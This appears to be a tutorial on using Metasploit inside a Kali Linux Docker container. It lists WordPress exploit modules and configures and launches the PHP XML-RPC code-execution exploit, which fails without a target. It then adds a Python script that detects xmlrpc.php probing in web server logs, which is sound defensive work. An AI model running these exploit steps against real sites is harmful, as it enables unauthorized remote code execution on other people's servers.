
The following is done after the steps in "Trying to start Kali Linux with Docker for Windows"; the commands are run inside that container.


PS C:\Users\shimizu> docker exec -it (container ID) /bin/bash

root@81c581d5cf43:/# apt-get update && apt-get -y upgrade && apt-get install -y kali-linux-web

root@81c581d5cf43:/# /etc/init.d/postgresql start
Starting PostgreSQL 12 database server: main.

root@81c581d5cf43:/# update-rc.d postgresql enable

root@81c581d5cf43:/# msfdb init


root@81c581d5cf43:/# msfconsole

  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:

       =[ metasploit v5.0.66-dev                          ]
+ -- --=[ 1956 exploits - 1092 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]


msf5 > search rank:excellent wordpress

Matching Modules

   #   Name                                                           Disclosure Date  Rank       Check  Description
   -   ----                                                           ---------------  ----       -----  -----------
   0   exploit/freebsd/local/rtld_execl_priv_esc                      2009-11-30       excellent  Yes    FreeBSD rtld execl() Privilege Escalation
   1   exploit/multi/http/wp_crop_rce                                 2019-02-19       excellent  Yes    WordPress Crop-image Shell Upload
   2   exploit/multi/http/wp_db_backup_rce                            2019-04-24       excellent  Yes    WP Database Backup RCE
   3   exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload  2016-05-04       excellent  Yes    WordPress Ninja Forms Unauthenticated File Upload
   4   exploit/multi/http/wp_responsive_thumbnail_slider_upload       2015-08-28       excellent  Yes    WordPress Responsive Thumbnail Slider Arbitrary File Upload
   5   exploit/unix/webapp/joomla_akeeba_unserialize                  2014-09-29       excellent  Yes    Joomla Akeeba Kickstart Unserialize Remote Code Execution
   6   exploit/unix/webapp/jquery_file_upload                         2018-10-09       excellent  Yes    blueimp's jQuery (Arbitrary) File Upload
   7   exploit/unix/webapp/php_xmlrpc_eval                            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution
   8   exploit/unix/webapp/wp_admin_shell_upload                      2015-02-21       excellent  Yes    WordPress Admin Shell Upload
   9   exploit/unix/webapp/wp_advanced_custom_fields_exec             2012-11-14       excellent  Yes    WordPress Plugin Advanced Custom Fields Remote File Inclusion
   10  exploit/unix/webapp/wp_ajax_load_more_file_upload              2015-10-10       excellent  Yes    WordPress Ajax Load More PHP Upload Vulnerability
   11  exploit/unix/webapp/wp_asset_manager_upload_exec               2012-05-26       excellent  Yes    WordPress Asset-Manager PHP File Upload Vulnerability
   12  exploit/unix/webapp/wp_creativecontactform_file_upload         2014-10-22       excellent  Yes    WordPress Creative Contact Form Upload Vulnerability
   13  exploit/unix/webapp/wp_downloadmanager_upload                  2014-12-03       excellent  Yes    WordPress Download Manager (download-manager) Unauthenticated File Upload
   14  exploit/unix/webapp/wp_easycart_unrestricted_file_upload       2015-01-08       excellent  No     WordPress WP EasyCart Unrestricted File Upload
   15  exploit/unix/webapp/wp_foxypress_upload                        2012-06-05       excellent  Yes    WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution
   16  exploit/unix/webapp/wp_frontend_editor_file_upload             2012-07-04       excellent  Yes    WordPress Front-end Editor File Upload
   17  exploit/unix/webapp/wp_holding_pattern_file_upload             2015-02-11       excellent  Yes    WordPress Holding Pattern Theme Arbitrary File Upload
   18  exploit/unix/webapp/wp_inboundio_marketing_file_upload         2015-03-24       excellent  Yes    WordPress InBoundio Marketing PHP Upload Vulnerability
   19  exploit/unix/webapp/wp_infusionsoft_upload                     2014-09-25       excellent  Yes    WordPress InfusionSoft Upload Vulnerability
   20  exploit/unix/webapp/wp_lastpost_exec                           2005-08-09       excellent  No     WordPress cache_lastpostdate Arbitrary Code Execution
   21  exploit/unix/webapp/wp_mobile_detector_upload_execute          2016-05-31       excellent  Yes    WordPress WP Mobile Detector 3.5 Shell Upload
   22  exploit/unix/webapp/wp_nmediawebsite_file_upload               2015-04-12       excellent  Yes    WordPress N-Media Website Contact Form Upload Vulnerability
   23  exploit/unix/webapp/wp_optimizepress_upload                    2013-11-29       excellent  Yes    WordPress OptimizePress Theme File Upload Vulnerability
   24  exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload  2014-11-11       excellent  Yes    WordPress Photo Gallery Unrestricted File Upload
   25  exploit/unix/webapp/wp_pixabay_images_upload                   2015-01-19       excellent  Yes    WordPress Pixabay Images PHP Code Upload
   26  exploit/unix/webapp/wp_plainview_activity_monitor_rce          2018-08-26       excellent  Yes    WordPress Plainview Activity Monitor RCE
   27  exploit/unix/webapp/wp_platform_exec                           2015-01-21       excellent  No     WordPress Platform Theme File Upload Vulnerability
   28  exploit/unix/webapp/wp_property_upload_exec                    2012-03-26       excellent  Yes    WordPress WP-Property PHP File Upload Vulnerability
   29  exploit/unix/webapp/wp_reflexgallery_file_upload               2012-12-30       excellent  Yes    WordPress Reflex Gallery Upload Vulnerability
   30  exploit/unix/webapp/wp_revslider_upload_execute                2014-11-26       excellent  Yes    WordPress RevSlider File Upload and Execute Vulnerability
   31  exploit/unix/webapp/wp_slideshowgallery_upload                 2014-08-28       excellent  Yes    WordPress SlideShow Gallery Authenticated File Upload
   32  exploit/unix/webapp/wp_symposium_shell_upload                  2014-12-11       excellent  Yes    WordPress WP Symposium 14.11 Shell Upload
   33  exploit/unix/webapp/wp_total_cache_exec                        2013-04-17       excellent  Yes    WordPress W3 Total Cache PHP Code Execution
   34  exploit/unix/webapp/wp_worktheflow_upload                      2015-03-14       excellent  Yes    WordPress Work The Flow Upload Vulnerability
   35  exploit/unix/webapp/wp_wpshop_ecommerce_file_upload            2015-03-09       excellent  Yes    WordPress WPshop eCommerce Arbitrary File Upload Vulnerability
   36  exploit/unix/webapp/wp_wptouch_file_upload                     2014-07-14       excellent  Yes    WordPress WPTouch Authenticated File Upload
   37  exploit/unix/webapp/wp_wysija_newsletters_upload               2014-07-01       excellent  Yes    WordPress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload
   38  exploit/windows/fileformat/ms12_005                            2012-01-10       excellent  No     MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability
   39  exploit/windows/fileformat/winrar_name_spoofing                2009-09-28       excellent  No     WinRAR Filename Spoofing


msf5 > use exploit/unix/webapp/php_xmlrpc_eval

msf5 exploit(unix/webapp/php_xmlrpc_eval) > info

       Name: PHP XML-RPC Arbitrary Code Execution
     Module: exploit/unix/webapp/php_xmlrpc_eval
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2005-06-29

Provided by:
  hdm <>
  cazz <>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  PATH     /xmlrpc.php      yes       Path to xmlrpc.php
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    80               yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 512

  This module exploits an arbitrary code execution flaw discovered in
  many implementations of the PHP XML-RPC module. This flaw is
  exploitable through a number of PHP web applications, including but
  not limited to Drupal, WordPress, Postnuke, and TikiWiki.

  OSVDB (17793)



msf5 exploit(unix/webapp/php_xmlrpc_eval) > set RHOSTS

msf5 exploit(unix/webapp/php_xmlrpc_eval) > set RPORT 443
RPORT => 443

msf5 exploit(unix/webapp/php_xmlrpc_eval) > set SSL true
SSL => true

msf5 exploit(unix/webapp/php_xmlrpc_eval) > show options

Module options (exploit/unix/webapp/php_xmlrpc_eval):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /xmlrpc.php      yes       Path to xmlrpc.php
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(unix/webapp/php_xmlrpc_eval) > exploit
[-] exploit failed: no response
[*] Exploit completed, but no session was created.
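
Seen from the server side, a run like the one above arrives as an HTTP POST to the path in the module's PATH option (/xmlrpc.php), since XML-RPC calls are carried in POST requests. The following is an added example, not part of the original post: it scans web access logs in the common "combined" format for such requests, counts them per client, and lists the clients that were actually answered with a 2xx. The log lines, IP addresses and threshold are constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample lines in Apache/nginx "combined" format (not from the post).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2020:10:01:02 +0900] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "curl/7.67.0"
203.0.113.7 - - [10/Jan/2020:10:01:03 +0900] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "curl/7.67.0"
203.0.113.7 - - [10/Jan/2020:10:01:05 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 153 "-" "curl/7.67.0"
198.51.100.20 - - [10/Jan/2020:10:02:00 +0900] "GET /xmlrpc.php HTTP/1.1" 405 42 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Jan/2020:10:02:10 +0900] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.55 - - [10/Jan/2020:10:03:00 +0900] "POST /xmlrpc.php?rsd HTTP/1.1" 403 199 "-" "-"
garbage line that does not parse
"""

# client IP, timestamp, request line (method + target), status code
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def xmlrpc_posts(log_text):
    """Yield (ip, path, status) for every POST whose path ends in /xmlrpc.php."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue                                  # unparsable or not a POST
        path = m["target"].split("?", 1)[0]           # ignore the query string
        if path.lower().endswith("/xmlrpc.php"):      # also matches sub-directories
            yield m["ip"], path, int(m["status"])

def summarize(log_text, threshold=2):
    """Return per-client counts, clients at or over threshold, and clients
    that received a 2xx (the endpoint was reachable and answered them)."""
    hits = list(xmlrpc_posts(log_text))
    per_ip = Counter(ip for ip, _, _ in hits)
    noisy = sorted(ip for ip, n in per_ip.items() if n >= threshold)
    answered = sorted({ip for ip, _, status in hits if 200 <= status < 300})
    return per_ip, noisy, answered

if __name__ == "__main__":
    per_ip, noisy, answered = summarize(SAMPLE_LOG)
    for ip, n in per_ip.most_common():
        print(f"{ip:15} POSTs to xmlrpc.php: {n}")
    print("at/over threshold:", noisy)
    print("received 2xx     :", answered)
```

A client that probes several directories for xmlrpc.php, as the first constructed client does, is worth a closer look even when most of its requests end in 404.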